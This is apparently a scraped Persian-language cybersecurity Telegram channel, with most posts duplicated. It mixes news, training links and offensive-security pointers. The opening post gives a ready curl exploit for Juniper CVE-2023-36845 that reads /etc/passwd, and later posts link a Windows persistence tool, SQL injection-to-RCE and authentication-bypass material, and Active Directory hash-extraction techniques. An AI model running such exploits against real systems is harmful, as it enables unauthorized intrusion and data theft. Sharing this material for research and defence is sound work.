⭕️Juniper Web Device Manager - RCE
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@Engineer_Computer
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@Engineer_Computer
⭕️اگر به توسعه ابزار های Persistence در ویندوز علاقه مندید ابزاری با زبان C# نوشته شده که امکاناتی دارد.
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@Engineer_Computer
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@Engineer_Computer
GitHub
GitHub - mertdas/RedPersist
Contribute to mertdas/RedPersist development by creating an account on GitHub.
⭕️ SQL injection to RCE
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLi
@Engineer_Computer
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLi
@Engineer_Computer
۶ عملی که مدیران عامل در هنگام مواجهه با خرابکاری سایبری باید انجام دهند
https://hbr.org/2023/09/6-actions-ceos-must-take-during-a-cyberattack?ab=hero-subleft-2
@Engineer_Computer
https://hbr.org/2023/09/6-actions-ceos-must-take-during-a-cyberattack?ab=hero-subleft-2
@Engineer_Computer
Harvard Business Review
6 Actions CEOs Must Take During a Cyberattack
Many have warned over the years of the growing cyber threats and some have offered thoughtful advice for how to strengthen an organization’s protection and resilience. Three questions can help determine whether enough has been done: First, have you participated…
امنیت فیزیکی
زیرساخت برق
https://covertaccessteam.substack.com/p/unplugging-cities-the-fragile-nature
@Engineer_Computer
زیرساخت برق
https://covertaccessteam.substack.com/p/unplugging-cities-the-fragile-nature
@Engineer_Computer
Substack
Unplugging Cities: The Fragile Nature of Power Substations
In the intricate weave of our modern lives, there's a constant humming in the background, one that we've almost become imperceptibly accustomed to – the power that drives our everyday existence.
❤1
۷۰ ساعت دوره آموزشی هکر قانونمند
با ۳۶ آزمایش
از سیسکو
رایگان
https://skillsforall.com/course/ethical-hacker?courseLang=en-USو
@Engineer_Computer
با ۳۶ آزمایش
از سیسکو
رایگان
https://skillsforall.com/course/ethical-hacker?courseLang=en-USو
@Engineer_Computer
🔥2
SQL authentication bypass .pdf
63.9 KB
برنامه نویسان و WAF کاران محترم
پارامتر های این مستند علیه شما برای محیط SQL استفاده میشود، توجه داشته باشید
@Engineer_Computer
پارامتر های این مستند علیه شما برای محیط SQL استفاده میشود، توجه داشته باشید
@Engineer_Computer
👍4👎1
#Video #MalwareAnalysis
▪️Reversing in action: Golang malware used in the SolarWinds attack. Part 1 and Part 2
در این دو ویدیو به تحلیل بدافزاری که در زبان برنامه نویسی Go نوشته شده بود و در حمله به SolarWinds استفاده شد، پرداخته میشود.
@Engineer_Computer
▪️Reversing in action: Golang malware used in the SolarWinds attack. Part 1 and Part 2
در این دو ویدیو به تحلیل بدافزاری که در زبان برنامه نویسی Go نوشته شده بود و در حمله به SolarWinds استفاده شد، پرداخته میشود.
@Engineer_Computer
#Tools
▪️LOLDrivers HTA Generator (Living Off The Land Drivers)
Disclaimer: This is an experimental HTA generator for LOLDrivers.
It's paramount to understand that this tool and the generated HTAs are crafted purely for educational and research goals.
Any unauthorized or malevolent use is vehemently discouraged and may be deemed illicit.
An EICAR is by default in the HTA and embedded in the driver.
@Engineer_Computer
▪️LOLDrivers HTA Generator (Living Off The Land Drivers)
Disclaimer: This is an experimental HTA generator for LOLDrivers.
It's paramount to understand that this tool and the generated HTAs are crafted purely for educational and research goals.
Any unauthorized or malevolent use is vehemently discouraged and may be deemed illicit.
An EICAR is by default in the HTA and embedded in the driver.
@Engineer_Computer
#Article #Programming
▪️Writing a Debugger From Scratch by Tim Misiak
در مجموعه جدید آموزشی آقای Tim Misiak به نام "نوشتن دیباگر از ابتدا" هدف اینه که تا جای ممکن با نحوه کار دیباگر ها آشنا بشید.
در ضمن نویسنده با زبان برنامه نویسی Rust این دیباگر رو جلو میبره.
DbgRs Part 1 - Attaching to a Process
DbgRs Part 2 - Register State and Stepping
DbgRs Part 3 - Reading Memory
DbgRs Part 4 - Exports and Private Symbols
DbgRs Part 5 - Breakpoints
@Engineer_Computer
▪️Writing a Debugger From Scratch by Tim Misiak
در مجموعه جدید آموزشی آقای Tim Misiak به نام "نوشتن دیباگر از ابتدا" هدف اینه که تا جای ممکن با نحوه کار دیباگر ها آشنا بشید.
در ضمن نویسنده با زبان برنامه نویسی Rust این دیباگر رو جلو میبره.
DbgRs Part 1 - Attaching to a Process
DbgRs Part 2 - Register State and Stepping
DbgRs Part 3 - Reading Memory
DbgRs Part 4 - Exports and Private Symbols
DbgRs Part 5 - Breakpoints
@Engineer_Computer
SPL Best Practices.pdf
9 MB
به روشهایی برای زبان SPL در اسپلانک
@Engineer_Computer
@Engineer_Computer
زمینی جدید برای مسابقه
شرکتی روسی برای یافتن آسیب پذیری در آیفون و اندروید جایزه گذاشته است
از ۲۰۰ هزاردلار تا ۲۰ میلیون دلار !!
خریداران آسیب پذیری از این شرکت، نمیتوانند جزو کشورهای عضو ناتو باشند .
https://techcrunch-com.cdn.ampproject.org/c/s/techcrunch.com/2023/09/27/russian-zero-day-seller-offers-20m-for-hacking-android-and-iphones/amp/
@Engineer_Computer
شرکتی روسی برای یافتن آسیب پذیری در آیفون و اندروید جایزه گذاشته است
از ۲۰۰ هزاردلار تا ۲۰ میلیون دلار !!
خریداران آسیب پذیری از این شرکت، نمیتوانند جزو کشورهای عضو ناتو باشند .
https://techcrunch-com.cdn.ampproject.org/c/s/techcrunch.com/2023/09/27/russian-zero-day-seller-offers-20m-for-hacking-android-and-iphones/amp/
@Engineer_Computer
TechCrunch
Russian zero-day seller offers $20M for hacking Android and iPhones
A company that acquires and sells zero-day exploits — flaws in software that are unknown to the affected developer — is now offering to pay researchers
مروری بر استاندارد NIST 800-204
در حوزه DevSecOps
https://resilientcyber.substack.com/p/software-supply-chain-security-in
@Engineer_Computer
در حوزه DevSecOps
https://resilientcyber.substack.com/p/software-supply-chain-security-in
@Engineer_Computer
www.resilientcyber.io
Software Supply Chain Security in DevSecOps & CI/CD
A look at NIST's 800-204 "Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines"
زمینی جدید برای مسابقه
شرکتی روسی برای یافتن آسیب پذیری در آیفون و اندروید جایزه گذاشته است
از ۲۰۰ هزاردلار تا ۲۰ میلیون دلار !!
خریداران آسیب پذیری از این شرکت، نمیتوانند جزو کشورهای عضو ناتو باشند .
https://techcrunch-com.cdn.ampproject.org/c/s/techcrunch.com/2023/09/27/russian-zero-day-seller-offers-20m-for-hacking-android-and-iphones/amp/
@Engineer_Computer
شرکتی روسی برای یافتن آسیب پذیری در آیفون و اندروید جایزه گذاشته است
از ۲۰۰ هزاردلار تا ۲۰ میلیون دلار !!
خریداران آسیب پذیری از این شرکت، نمیتوانند جزو کشورهای عضو ناتو باشند .
https://techcrunch-com.cdn.ampproject.org/c/s/techcrunch.com/2023/09/27/russian-zero-day-seller-offers-20m-for-hacking-android-and-iphones/amp/
@Engineer_Computer
TechCrunch
Russian zero-day seller offers $20M for hacking Android and iPhones
A company that acquires and sells zero-day exploits — flaws in software that are unknown to the affected developer — is now offering to pay researchers
دزدیدن هش پسورد های اکتیو دایرکتوری
استفاده از آنها
روش مقابله
https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/
@Engineer_Computer
استفاده از آنها
روش مقابله
https://blog.netwrix.com/2021/11/30/extracting-password-hashes-from-the-ntds-dit-file/
@Engineer_Computer
Netwrix
Extracting Password Hashes from the Ntds.dit File
Learn how attackers exfiltrate the Ntds.dit file from Active Directory domain controllers and how to defend against this attack.
دستگاه تستر امنیتی Flipper Zero
که توسط مسافر در کوله پشتی حمل میشد توسط نیروهای حفاظت پرواز گرفته شد .
https://www-dailydot-com.cdn.ampproject.org/c/s/www.dailydot.com/debug/gatwick-airport-seizes-flipper-zero/?amp
@Engineer_Computer
که توسط مسافر در کوله پشتی حمل میشد توسط نیروهای حفاظت پرواز گرفته شد .
https://www-dailydot-com.cdn.ampproject.org/c/s/www.dailydot.com/debug/gatwick-airport-seizes-flipper-zero/?amp
@Engineer_Computer
The Daily Dot
Airport seizes of Flipper Zero from passenger's luggage over security concerns
Governments have been concerned about the device.